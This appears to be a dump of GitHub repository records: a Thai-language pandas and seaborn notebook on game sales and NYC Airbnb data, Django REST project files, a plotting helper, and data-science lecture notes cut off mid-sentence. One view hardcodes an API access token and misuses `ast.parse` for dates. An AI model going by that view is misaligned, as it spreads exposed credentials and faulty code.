y = 'NA_Sales', x = year.index, title = 'NA Sales', labels = {'x':'Year'})\nfig.show()\n\n\n# 24. สร้าง Stripplot โดยให้แกน X เป็น Genre และ แกน Y เป็นรายได้ทั่วโลก\n\n# In[458]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.stripplot(x = 'Genre', y = 'Global_Sales',data = df_new)\nfig.show()\n\n\n# 25. 
สร้าง Distribution Plot ของปี\n\n# In[459]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.distplot(df['Year'])\n\n\n# 26. สร้าง Bar Plot แสดงรายได้รวมในญี่ปุ่นรายปี\n\n# In[340]:\n\n\nJapan_Sales = df_new.groupby('Year').sum()\nJapan_Sales.head()\n\n\n# In[344]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.barplot(data = Japan_Sales, x = Japan_Sales.index, y = 'JP_Sales')\nfig.autofmt_xdate()\nfig.show()\n\n\n# Part 2: Airbnb\n\n# 1. Import ไฟล์ AB_NYC_2019 และ เช็คข้อมูลเบื้องต้น\n\n# In[353]:\n\n\nbnb = pd.read_csv('../Desktop/DataCamp/AB_NYC_2019.csv')\nbnb.head()\n\n\n# In[463]:\n\n\nbnb.info()\n\n\n# 2. สุ่มอ่านข้อมูล 10 แถว หัว 5 แถว และท้าย 10 แถว\n\n# In[354]:\n\n\nbnb.sample(10)\n\n\n# In[355]:\n\n\nbnb.head(5)\n\n\n# In[356]:\n\n\nbnb.tail(10)\n\n\n# 3. หา Top 10 Neighbourhood ยอดฮิต พร้อมระบุจำนวน\n\n# In[466]:\n\n\ncountNeighbourhood = bnb['neighbourhood'].value_counts()\ncountNeighbourhood = pd.DataFrame(countNeighbourhood)\ncountNeighbourhood = countNeighbourhood.rename(columns = {'neighbourhood':'count'})\ncountNeighbourhood.head()\n\n\n# 4. หา Bottom 10 Neighbourhood ยอดฮิต พร้อมระบุจำนวน\n\n# In[491]:\n\n\ncountNeighbourhood = bnb.groupby('neighbourhood').size().reset_index(name = 'count').sort_values('count')[::-1]\ncountNeighbourhood.tail(10)\n\n\n# 5. หา Top 10 Neighbourhood Group ยอดฮิต พร้อมระบุจำนวน\n\n# In[359]:\n\n\ncountNeighbourhoodGroup = bnb['neighbourhood_group'].value_counts()\ncountNeighbourhoodGroup.head(10)\n\n\n# 6. หา Bottom 10 Neighbourhood Group ยอดฮิต พร้อมระบุจำนวน\n\n# In[360]:\n\n\ncountNeighbourhoodGroup = bnb['neighbourhood_group'].value_counts()\ncountNeighbourhoodGroup.tail(10)\n\n\n# 7. หาค่าเฉลี่ยราคาของพื้นที่ และเขต\n\n# In[361]:\n\n\ngroupby_neighbourhood_group = bnb.groupby('neighbourhood_group').mean()\ngroupby_neighbourhood_group['price'] #bnb.groupby('neighbourhood_group').mean()['price'] \n\n\n# In[497]:\n\n\ngroupby_neighbourhood = bnb.groupby('neighbourhood').mean().reset_index()[['neighbourhood','price']].sort_values('price')[::-1]\ngroupby_neighbourhood\n\n\n# 8. จงหาว่าห้องประเภทใดมีราคาเฉลี่ยมากที่สุด\n\n# In[363]:\n\n\ngroupby_roomtype = bnb.groupby('room_type').mean()\ngroupby_roomtype['price']\n\n\n# 9. จงหาว่าพื้นที่ใดมีข้อมูลพื้นที่อยู่แค่หน่วยเดียว\n\n# In[364]:\n\n\ncountNeighbourhood[countNeighbourhood ==1]\n\n\n# 10. จงหาว่าที่พักแบบใดมีการให้บริการมากที่สุด และมากเท่าใด\n\n# In[505]:\n\n\nroom_type = bnb['room_type'].value_counts()\nroom_type = pd.DataFrame(room_type)\nroom_type = room_type.rename(columns = {'room_type':'count'})\nroom_type\n\n\n# 11. จงหาว่าพื้นที่ใดมีจำนวนรีวิวมากที่สุด และ เขตใดมีจำนวนรีวิวมากที่สุด\n\n# In[513]:\n\n\nbnb.groupby('neighbourhood').sum().sort_values('number_of_reviews')[::-1].head(1)\n\n\n# In[515]:\n\n\nbnb.groupby('neighbourhood_group').sum().sort_values('number_of_reviews')[::-1].head(1)\n\n\n# 12. จงหา Top 3 จำนวน Minimum Nights ที่มีเขตไม่ซ้ำกัน\n\n# In[520]:\n\n\nbnb.sort_values('minimum_nights')[::-1].drop_duplicates('neighbourhood_group').head(3)\n\n\n# 13. จงหาชื่อ Host ที่ลิสที่อยู่มากที่สุด 10 อันดับแรก (Hint: ใช้ชื่อไม่ได้)\n\n# In[543]:\n\n\nhost = bnb.sort_values('calculated_host_listings_count')[::-1] .drop_duplicates('calculated_host_listings_count') .head(10)\nhost[['host_id','host_name','calculated_host_listings_count']] \n\n\n# 14. 
จงหาชื่อ Host ที่มีชื่อซ้ำกันมากที่สุด 10 ชื่อ (โดยที่ไม่ใช้คนเดียวกัน)\n\n# In[563]:\n\n\nhost = bnb.sort_values('host_id')[::-1] .drop_duplicates('host_id')\nhost_duplicate = host['host_name'].value_counts()\nhost_duplicate[host_duplicate>1].head(10)\n\n\n# 15. จงหาชื่อ Host ที่มีรีวิวมากที่สุด 10 อันดับแรก\n\n# In[567]:\n\n\nbnb.groupby(['host_id','host_name'],as_index = False).sum().sort_values('number_of_reviews')[::-1].head(10)\n\n\n# 16. จงหาชื่อ Host ที่มีการลิสที่อยู่ที่มีราคาเฉลี่ยสูงที่สุด 10 อันดับแรก\n\n# In[574]:\n\n\nbnb.groupby(['host_id','host_name'],as_index = False).mean().sort_values('price')[::-1].head(10)\n\n\n# 17. จงเพิ่ม 2 คอลัมน์ชื่อ Year และ Month จาก last review ต่อท้าย โดยใช้ข้อมูลจากคอลัมน์ last_review (Hint: ใช้ lambda)\n\n# In[576]:\n\n\nbnb.head()\n\n\n# In[588]:\n\n\nbnb2 = bnb.dropna()\nbnb2[['Year','Month','Date']] = bnb2.last_review.str.split(\"-\",expand=True)\nbnb2.head()\n\n\n# 18. สร้าง column ใหม่ โดยให้บรรจุ Time of the week (วันจันทร์ อังคาร....) โดยใช้ข้อมูลจาก last_review (Hint: ใช้ timestamp เข้ามาช่วย) \n\n# In[699]:\n\n\nday_of_week = {0:'Mon',1:'Tue', 2:'Wed', 3:'Thur', 4:'Fri', 5:'Sat',6:'Sun'}\nbnb2['last_review'] = pd.to_datetime(bnb2['last_review'])\nbnb2['day_of_week'] = bnb2['last_review'].apply(lambda time: time.dayofweek)\nbnb2['day_of_week'] = bnb2['day_of_week'].map(day_of_week)\nbnb2_day = bnb2.drop('day of week',axis = 1)\nbnb2_day.head()\n\n\n# 19. สร้าง Count Plot นับข้อมูลประเภทของที่อยู่อาศัย\n\n# In[598]:\n\n\nfig = plt.figure(figsize = (12,8))\nsns.countplot(data = bnb, x = 'room_type')\nfig.show()\n\n\n# 20. สร้าง Pie Chart หาพื้นที่ ที่มีที่อยู่อาศัยเยอะที่สุด 5 อันดับแรก\n\n# In[377]:\n\n\nTop5Areas = bnb.groupby('neighbourhood').count().sort_values('id')[::-1].head(5)\nTop5Areas\n\n\n# In[378]:\n\n\nfig = px.pie(Top5Areas, values = 'id', names = Top5Areas.index)\nfig.show()\n\n\n# 21. สร้าง Box Plot โดยให้แกน X เป็น เขต และ Y เป็นจำนวนรีวิว\n\n# In[685]:\n\n\nfig = plt.figure(figsize = (25,10))\nfig = sns.boxplot(data = bnb, x = 'neighbourhood_group',y = 'number_of_reviews')\nfig.set(ylim = (0,80))\n\n\n# 22. สร้าง HeatMap จาก Correlation ของ DataFrame และพิจารณาดูความสัมพันธ์ พร้อมกับนำความสัมพันธ์ที่เป็น Strongest Positive มาทำ Scatter Plot\n\n# In[604]:\n\n\nbnb_corr = bnb.corr()\nbnb_corr\n\n\n# In[611]:\n\n\nfig = plt.figure(figsize = (15,15))\nsns.heatmap(bnb_corr, annot = True)\n\n\n# In[614]:\n\n\nfig = plt.figure(figsize = (12,10))\nsns.scatterplot(data = bnb, x = 'reviews_per_month',y = 'number_of_reviews')\nfig.show()\n\n\n# 23. สร้าง Bar plot หาจำนวน Last review ของแต่ละเดือนของปี 2018 (change from count plot to bar plot)\n\n# In[701]:\n\n\nbnb3 = bnb2_day.groupby(['Year','Month'], as_index = False).sum()\nbnb4 = bnb3[bnb3['Year'] == '2018']\nbnb4\n\n\n# In[686]:\n\n\nfig = plt.figure(figsize = (12,10))\nsns.barplot(data = bnb4, x = 'Month', y = 'number_of_reviews')\nfig.show()\n\n\n# 24. สร้าง Pie Chart หาอัตราส่วน Last Review ในแต่ละวัน\n\n# In[700]:\n\n\nfig = px.pie(bnb2_day , values = 'number_of_reviews', names = 'day_of_week')\nfig.show()\n\n\n# 25. สร้าง Line Graph หาราคาเฉลี่ยในแต่ละเดือนของ Last Review ในปี 2019\n\n# In[702]:\n\n\nbnb5 = bnb2_day.groupby(['Year','Month'], as_index = False).mean()\nbnb6 = bnb5[bnb5['Year'] == '2019']\nbnb6 #vdo is wrong no 2019 \n\n\n# In[707]:\n\n\npx.line(bnb6 , x = 'Month',y = 'price')\n\n\n# 26. 
สร้าง Column ใหม่ โดยคำนวณ ณ เวลาปัจจุบันถึงวันที่ Last Review ห่างกันกี่วัน (Hint: ใช้ datetime ปัจจุบัน - datetime last review)\n\n# In[713]:\n\n\nimport datetime\ntoday = datetime.datetime.today()\ntoday \n\n\n# In[717]:\n\n\nbnb2_day['diff']= bnb2_day['last_review'].apply(lambda past: (today - past).days)\nbnb2_day.head()\n\n\n# 27. สร้าง Pie Chart ของระยะห่างของเวลา ระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละเขต (หน่วยเป็นวัน)\n\n# In[720]:\n\n\nbnb7 = bnb2_day.groupby('neighbourhood_group', as_index = False).mean()\nbnb7\n\n\n# In[721]:\n\n\nfig = px.pie(bnb7 , values = 'diff', names = 'neighbourhood_group')\nfig.show()\n\n\n# 28. สร้าง Bar Plot ของระยะห่างของเวลา ระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละพื้นที่ 10 พื้นที่แรกที่มีระยะเวลามากที่สุด (หน่วยเป็นวัน)\n\n# In[724]:\n\n\nbnb8 = bnb2_day.groupby('neighbourhood', as_index = False).mean().sort_values('diff')[::-1].head(10)\nbnb8.head()\n\n\n# In[727]:\n\n\nfig = plt.figure(figsize = (23,10))\nsns.barplot(data = bnb8, x = 'neighbourhood', y = 'diff')\nfig.show()\n\n\n# 29. สร้าง Bar Plot ของค่าเฉลี่ยระยะเวลาห่างระหว่างปัจจุบันถึง Last review เฉลี่ย ของแต่ละพื้นที่ 10 พื้นที่แรกที่มีระยะเวลาน้อยที่สุด \n\n# In[728]:\n\n\nbnb9 = bnb2_day.groupby('neighbourhood', as_index = False).mean().sort_values('diff')[::-1].tail(10)\nbnb9.head()\n\n\n# In[729]:\n\n\nfig = plt.figure(figsize = (23,10))\nsns.barplot(data = bnb9, x = 'neighbourhood', y = 'diff')\nfig.show()\n\n\n# 30. สร้าง Scatter Plot หาความสัมพันธ์ระหว่าง ระยะเวลาห่างระหว่างปัจจุบันถึง Last review กับ Minimum Nights (Hint: Correlation)\n\n# In[730]:\n\n\nfig = plt.figure(figsize = (15,15))\nsns.heatmap(bnb_corr, annot = True)\n\n\n# In[732]:\n\n\nfig = plt.figure(figsize = (20,10))\nsns.scatterplot(data = bnb2_day, x = 'diff',y = 'minimum_nights')\nfig.show()\n\n\n# In[733]:\n\n\npx.scatter(bnb2_day, x = 'diff',y = 'minimum_nights')\n\n" } ]
2
kazoon-n/django-rest
https://github.com/kazoon-n/django-rest
d48fe9d527d80529426a3fc0f7bd967168d5a8b0
fd850eae30981d7f348b639c2335689a36294512
313424e91b5810d3110b9de161a3269b581d9211
refs/heads/master
2022-12-24T01:53:03.371323
2019-02-23T10:30:14
2019-02-23T10:30:14
172,196,366
0
0
null
2019-02-23T09:33:13
2019-02-23T10:30:16
2022-12-08T01:38:07
Python
[ { "alpha_fraction": 0.4979591965675354, "alphanum_fraction": 0.7061224579811096, "avg_line_length": 16.5, "blob_id": "922fa411552f1fec78a0ffe2e691293274f334dd", "content_id": "aa51dbae80c7c62ebb69f69505dcc4debd9dcd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 245, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/requirements-dev.txt", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "certifi==2018.11.29\nchardet==3.0.4\ndj-database-url==0.5.0\ndj-static==0.0.6\nDjango==2.1.5\ndjango-filter==2.0.0\ndjangorestframework==3.9.0\nidna==2.8\nMarkdown==3.0.1\npython-decouple==3.1\npytz==2018.9\nrequests==2.21.0\nstatic3==0.7.0\nurllib3==1.24.1\n" }, { "alpha_fraction": 0.49668875336647034, "alphanum_fraction": 0.5496688485145569, "avg_line_length": 25.2608699798584, "blob_id": "ea94d764fb7351e40b756ee355f87b9bbf7985d7", "content_id": "6b61f47af797fe4c6a0f71066d1bbc758691e19b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 122, "num_lines": 23, "path": "/core/migrations/0003_auto_20190112_0309.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-12 03:09\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0002_auto_20190110_1720'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='customer',\n old_name='date_sheet',\n new_name='data_sheet',\n ),\n migrations.AlterField(\n model_name='document',\n name='dtype',\n field=models.CharField(choices=[('ID', 'Identity card'), ('OT', 'others'), ('PP', 'Passport')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "765c96779a0c06ec951d1bdf64657a99d6fe6697", "content_id": "3f060b27d66b695b2a0e789a7fbf40045c31ece5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/pm25main/apps.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass Pm25MainConfig(AppConfig):\n name = 'pm25main'\n" }, { "alpha_fraction": 0.5118694305419922, "alphanum_fraction": 0.562314510345459, "avg_line_length": 27.08333396911621, "blob_id": "e40179c63a62889d56fed80d4d6ffed5a369424b", "content_id": "76a17a5b9b072a50a6b9e2f29534f97a9679ed28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/core/migrations/0008_auto_20190128_1554.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-28 15:54\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0007_auto_20190115_1713'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='doc',\n field=models.CharField(default='testdoc', max_length=12, unique=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='document',\n name='dtype',\n field=models.CharField(choices=[('ID', 'Identity card'), ('PP', 'Passport'), ('OT', 'others')], max_length=2),\n ),\n ]\n" }, 
{ "alpha_fraction": 0.703125, "alphanum_fraction": 0.703125, "avg_line_length": 20.33333396911621, "blob_id": "53a671479fc0b62e0f5763778f73ffc789addb6b", "content_id": "d34b4e9fd0e6d39cc43bb024a8a4890327ac068b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 59, "num_lines": 6, "path": "/importer/urls.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('execute/', views.call_importer, name=\"importer\"),\n]\n" }, { "alpha_fraction": 0.6164153814315796, "alphanum_fraction": 0.6359575390815735, "avg_line_length": 27.41269874572754, "blob_id": "763c62d0182bafe5bbafa29db2c4633c4510a1ad", "content_id": "108a9649acbbf177844e5ce5675f1dd90def0f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 101, "num_lines": 63, "path": "/importer/views.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "import logging\nfrom ast import parse\n\nimport requests\nfrom django.core.management import BaseCommand\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom django.template.base import logger\nfrom rest_framework.utils import json\n\nlogger = logging.getLogger(\"command\")\n\nAPI_END_POINT = (\"https://api.waqi.info/feed/{city}/?token=f8c14b8df33312a1d1842fe35e360768f958f4c0\")\n\n\ndef aquire_pm25_data_from_api(city: str):\n\n request_url = API_END_POINT.format(\n city=city,\n )\n res = requests.get(request_url)\n res.raise_for_status()\n row_data = json.loads(res.content)[\"data\"]\n\n logger.info(\"Finish importing data of PM2.5\")\n\n return row_data\n\n\ndef call_importer(request):\n city = request.GET[\"city\"]\n\n res = aquire_pm25_data_from_api(city)\n\n return res\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--from_date\", default=None)\n parser.add_argument(\"--to_date\", default=None)\n parser.add_argument(\"--city\", default='bangkok')\n\n def handle(self, *args, **options):\n from_date = options.get(\"from_date\")\n to_date = options.get(\"to_date\")\n city = options.get(\"city\")\n\n if from_date is not None:\n try:\n from_date = parse(from_date)\n except (ValueError, OverflowError) as e:\n raise ValueError(\"The format of the from_date is wrong: %s.\" % e)\n\n if to_date is not None:\n try:\n to_date = parse(to_date)\n except (ValueError, OverflowError) as e:\n raise ValueError(\"The format of the to_date is wrong: %s.\" % e)\n logger.info(\"start: update exchange rate\")\n aquire_pm25_data_from_api(city)\n logger.info(\"end: update exchange rate\")\n\n" }, { "alpha_fraction": 0.5490196347236633, "alphanum_fraction": 0.593837559223175, "avg_line_length": 28.75, "blob_id": "a66bea2f6ecdbeec545ed8aacb0fb40622d75d96", "content_id": "f21a3c9388fb43f458464898ae86ac0a2223b067", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/core/migrations/0011_auto_20190217_0908.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-02-17 09:08\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', 
'0010_auto_20190217_0814'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='customer',\n            name='data_sheet',\n            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.DataSheet'),\n        ),\n        migrations.AlterField(\n            model_name='document',\n            name='dtype',\n            field=models.CharField(choices=[('ID', 'Identity card'), ('OT', 'others'), ('PP', 'Passport')], max_length=2),\n        ),\n    ]\n" }, { "alpha_fraction": 0.7922077775001526, "alphanum_fraction": 0.8051947951316833, "avg_line_length": 18.375, "blob_id": "63141529cb6cdf29544d201df5fbf388ed4a5293", "content_id": "6d5b86e50b565cc9e9322e3b02eb23d7b67b6dab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/pm25main/views.py", "repo_name": "kazoon-n/django-rest", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import viewsets\n\n\nclass Pm25GetViewSet(viewsets.ModelViewSet):\n    pass" } ]
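Below is an editor-added sketch (not part of the repository snapshot above) of how the empty `Pm25GetViewSet` stub could be wired up in Django REST Framework. The `Pm25Record` model and `Pm25RecordSerializer` are assumed, illustrative names; the repo's actual models are not included in this dump.

```python
# Hypothetical completion of the Pm25GetViewSet stub shown above.
# Pm25Record / Pm25RecordSerializer are assumed names for illustration only.
from rest_framework import serializers, viewsets

from pm25main.models import Pm25Record  # assumed model, not in the snapshot


class Pm25RecordSerializer(serializers.ModelSerializer):
    class Meta:
        model = Pm25Record
        fields = "__all__"


class Pm25GetViewSet(viewsets.ModelViewSet):
    """Read/write API endpoint for PM2.5 measurements."""
    queryset = Pm25Record.objects.all()
    serializer_class = Pm25RecordSerializer
```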
8
emanuelfeld/ml-coursera
https://github.com/emanuelfeld/ml-coursera
9451dedf530b221f2569fc294065c6af0ac1411a
f8b8b450af3bc2d955b0dde8e59b966407524ddc
1561a678a8b0d97453d28ea7e3a8f949b042f108
refs/heads/master
2021-09-03T06:04:59.258526
2018-01-06T05:53:16
2018-01-06T05:53:16
116,452,070
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5651537179946899, "alphanum_fraction": 0.5915080308914185, "avg_line_length": 30.090909957885742, "blob_id": "a6072ffac4f32ba00f059a26faba61c4d9693073", "content_id": "092a00372ea7671c3dbdc93a8778495bfe34132b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 683, "license_type": "no_license", "max_line_length": 68, "num_lines": 22, "path": "/utilities.py", "repo_name": "emanuelfeld/ml-coursera", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_mnist_result(X, y, prediction):\n # plot 25 random points in a grid\n idx = np.random.choice(np.arange(X.shape[0]), 25, replace=False)\n X_sample = X[idx]\n p_sample = prediction.flatten()[idx]\n y_sample = y.flatten()[idx]\n \n for i in range(25):\n pixels = X_sample[i].reshape((20, 20))\n color = 'green' if p_sample[i] == y_sample[i] else 'red'\n title = p_sample[i] if p_sample[i] != 10 else 0\n\n plt.subplot(5, 5, i + 1)\n plt.axis('off')\n plt.title(title, color=color)\n plt.subplots_adjust(wspace=2)\n plt.imshow(pixels.T, cmap='gray')\n\n plt.show()" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 13.333333015441895, "blob_id": "0289aee75c4d82c2a65316212fe09b448b23723e", "content_id": "eba1541eecbcfb20c401d3732027f9dd7fbdf7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 27, "num_lines": 3, "path": "/README.md", "repo_name": "emanuelfeld/ml-coursera", "src_encoding": "UTF-8", "text": "# ml-coursera\n\nCoursera ML class in Python" } ]
2
geoffisdancing/galnotes
https://github.com/geoffisdancing/galnotes
23ee822a310e9df22918c2813cfcbc37545da166
81567e294d6d07a51c7561aefa3054bdbf620b40
1937f9904bd592c2901c69a2481e726ce81f65f9
refs/heads/master
2021-01-20T20:32:42.140995
2017-08-03T18:19:00
2017-08-03T18:19:00
62,321,843
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7367845773696899, "alphanum_fraction": 0.7428185939788818, "avg_line_length": 81.86377716064453, "blob_id": "adb9c0e86ea87eb878f3b683c5e6c75a751d7e55", "content_id": "0b7c00b124cd8806a63699a169caaa88ea50156f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105315, "license_type": "no_license", "max_line_length": 496, "num_lines": 1270, "path": "/160601 Galvanize Lecture Notes.md", "repo_name": "geoffisdancing/galnotes", "src_encoding": "UTF-8", "text": "160822 Model Comparison Lecture\n 1. Linear Model\n - Interpretability, given the linear assumption\n - R2 represents the total variabilty explained by the model. Recall that by adding more features, R2 increases, so be aware that this is a limitaiton of R2 (doesn't penalize for increased features (model complexity))\n - So adjusted R2, AIC, BIC account for increased complexity\n - Need to assume constant variance in errors (homoskedastic)\n - ie residuals are clustered randomly as x increases in residual plot.\n - can do transformations to address this (because will be biased in the long-run)\n - Assume mean zero\n - Assume no multicolinearity, assume no autoregressive terms\n 2. Logistic Regression\n - Need to normalize each feature if you want to interpret betas as strenghts of association\n - Regularization of regression (in general) with Ridge/Lasso helps to optimize the Bias/Variance tradeoff, such that you decrease variance without sacrificing too much Bias\n - Elastic net as the nice combination of LASSO & Ridge.\n 3. KNN\n - Pick \"k\" using cross-validation\n - Can be helpful to impute data\n 4. Decision Trees\n - Can only do axis parallel splits\n - In regression , minimize mean squared error in each leaf\n - In classification, minimize \"information criteria\" Not sure, review\n - \"Greedy algorithm\" meaning will pick the best split at the given point, without regard for the bigger picture performance.\n - Almost never converges to the global optimimum\n - Slow, because will look at every possible split at every node, so this take a lot of computational time.\n - Deterministic, meaning it will build the same tree each time\n - Decide on tree depth:\n - Prepruning: depth, number of points in node etc\n - Post pruning: prune back after making it deep .\n 5. Ensembling techniques\n - Bagging: Bootstrap Aggregating\n - Create bunch of trees on a bootstrapped subsample of the data\n - Inherently correlated\n - But decrease variance\n - Random forest: Same as Bagging, except that at each split, limit features space\n - Taking the average of trees, so, makes it difficult to overfit\n 6. SVM\n - Perform fairly well in high dimension cases\n 7. Gradient Boosting\n - Forward stagewise, learns from the prior model\n - Gradient descent by fitting a new tree to the residuals\n - Aggregating, trying to fit to where you didn't fit as well earlier\n - Hyperparameters:\n - depth of tree\n - learning rate: ignore votes of some tree\n - number of trees\n - minimum samples per leaf\n 8. 
Unsupervised Methods\n - K Means\n - can't include categorical variables \n - need to scale the variables\n - Hierarchical Clustering\n - Choose two points close to one another, form groups from bottom up\n - Dendrograms result and you can then chop off dendrograms at certain points to determine what groups look at at that point\n - Benefit is you don't need to pick K at each point\n - PCA\n - Reduce dimensionality\n - There's the possibility that the explanatory variable with the greatest predictive power is not in one of the dimensions reduced by PCA, causing it not to perform well\n - SVD is a way of fitting\n - Can do some latent feature analysis\n\n\n\n\n160722 Graph Theory\n 1. Terms:\n - A graph is an unordered pair G = (V, E)\n - V is our set of vertices\n - E is a set of edges (pairs of vertices)\n - V = {1,2,3}, E = {{1,2}, {2,3} etc}\n - ORder is number of vertices, Size is number of edges\n - Simple Graph: No loops and no multiple edges\n - Degree: Number of neighbors\n - For an undirected graph, an adjacency matrix is symmetric across the diagonal\n - An Adjacency list is a list of nodes and edges denoting connection. An adjacency list requires storage of VxE, whereas an adjacency matrix requires storage of V^2 (since its a matrix)\n - For lookup, Adjacency list requires searching V items for your answer, a matrix essentially doesn't require lookup since you can index right to your answer\n 2. Node importance\n - Degree centrality = # of connections\n - Betweenness centrality = a measure of node importance based on how many (shortest) paths cross through a given node\n - Eigenvector centrality = Take the eigenvector of the adjacency matrix multiplied by matrix of ones, then again over and over see SSS21\n - Way of accounting for the importance of nodes who are connections to a given node to determine the importance / centrality of the given node\n - SSS21\n - What Makes a community:\n - Mutual Ties\n - Compactness\n - Dense edges\n - Separation from other groups\n - Modularity, Q, is a measure of community-ness\n - SSS22 Modularity equation\n - m is total number of degrees in the network\n - Heuristic to maximize modularity is to cut the edges with the greatest betweenness centrality, and calculate the modularity equation in the remaining communities created--and graph this; repeat for the next edge with next highest betweenness centrality. The edge at which this will peak and this peak is appx where the Q is maximized.\n\n\n160721 Spark AWS\n 1. Spark Data Frames\n - Faster than traditional RDDs.\n - Abstraction that simplifies working with structured databases.\n - So after creating a spark context, you instantiate a hive or SQL context (feeding it the spark context).\n - Load up data directly into the hive context.\n\n\n160720 Apache Spark\n 1. Overall\n - Spark is a framework for distributed processing\n - Streamlined alternative to Map-Reduce\n - Spark can be written in Scala, Java or Python\n - Can analyze petabytes of data\n - Faster than Map Reduce, API is simpler\n - Spark job consists of a series of map and reduce function\n - Intermediate data is kept in memory rather than written to disk\n - Trade off is that it requires more memory.\n - Spark outshines Map Reduce with iterative algorithms, where you don't have to save results of each step to disk\n - For non-iterative algorithms Spark is comparable to Map Reduce\n 2. 
Spark\n - HIGH LEVEL SUMMARY: So with spark, you construct the RDD, feed it a list of data, then perform a series of transformations (can be many) until you have what you want and then perform an action to aggregate the result.\n - A Spark job pushes the data to the cluster, all computation happens on the executors, then the result is sent back to the driver.\n - Spark does the parallelizing for you!\n - RDD:\tResilient Distributed Dataset or a distributed sequence of records\n - Spark Job:\tSequence of transformations on data with a final action\n - Transformation:\tSpark operation that produces an RDD\n - Action:\tSpark operation that produces a local object\n - Spark Application:\tSequence of Spark jobs and other code\n - Transformations occur on the Worker nodes\n - The data is collected on the Driver\n 3.\n - Group by key stores the values in memory, where as reduce by key, you only maintain the current accumulator so it is more light weight. But if you need the individual elements, you need to use group by key.\n - Spark MLib : ML library for use on Spark\n\n\n\n\n\n160719 Map Reduce\n 1. MMD Reading: Map Reduce\n A. Several distributed file systems: Google File System, Hadoop Distributed FIle System, CloudStore\n - Very large files (if small, no need for DFS) KEY REQUIREMENT\n - Files rarely updated, rather they are read as data KEY REQUIREMENT\n - Files are divided into chunks 64MB size, repeated ~3 times at three different nodes\n B. Overall Map-Reduce Structure:\n - Some number of Map tasks are given one or more chunks from a distributed file system. These Map tasks turn the chunk into a sequence of key-value pairs. The Map function determines how to calculate the value from the key.\n - Key value pairs are collected by the master controller and sorted by key. All key-values pairs with the same key end up with the same Reduce task.\n - The Reduce function combines all values associated with a given key in the way determined by the Reduce function.\n 2. Big Data - Distributed Computing \n A. The three Vs of Big Data\n - High Volume, Velocity, Variety\n - With distributed computing systems (involving many computers) you can scale \"out\" which means adding more computers which can thus take advantage of parallelizable algorithms\n - Distributed Computing pros: Better scalability, easy to add more machines than to add more cores to a machine.\n - Fault tolerance - if one machine fails the whole network is not down\n - There is overhead involved with having multiple computers in a network communicate with each other, and there is a restrained set of problems that can readily be solved in a paralellizable way. So these considerations must be made when deciding whether to use distributed solutions.\n B. Map Reduce \n - Pushes the code to the data (rather than moving data to the code)\n - Map Reduce handles details of distributed computing taking care of:\n - Parallelization and Distribution\n - Partitioning (shuffle & sort)\n - Fault tolerance\n - Resource Management\n - Status and monitoring\n - Map Function: Applies a function to each elements of a data structure\n - Action of taking in some form of data and filter/transforming it into another form. Outputs 0 or more possibly transformed versions of the data\n - Reduce Function: Takes a function which aggregates the elements of a data 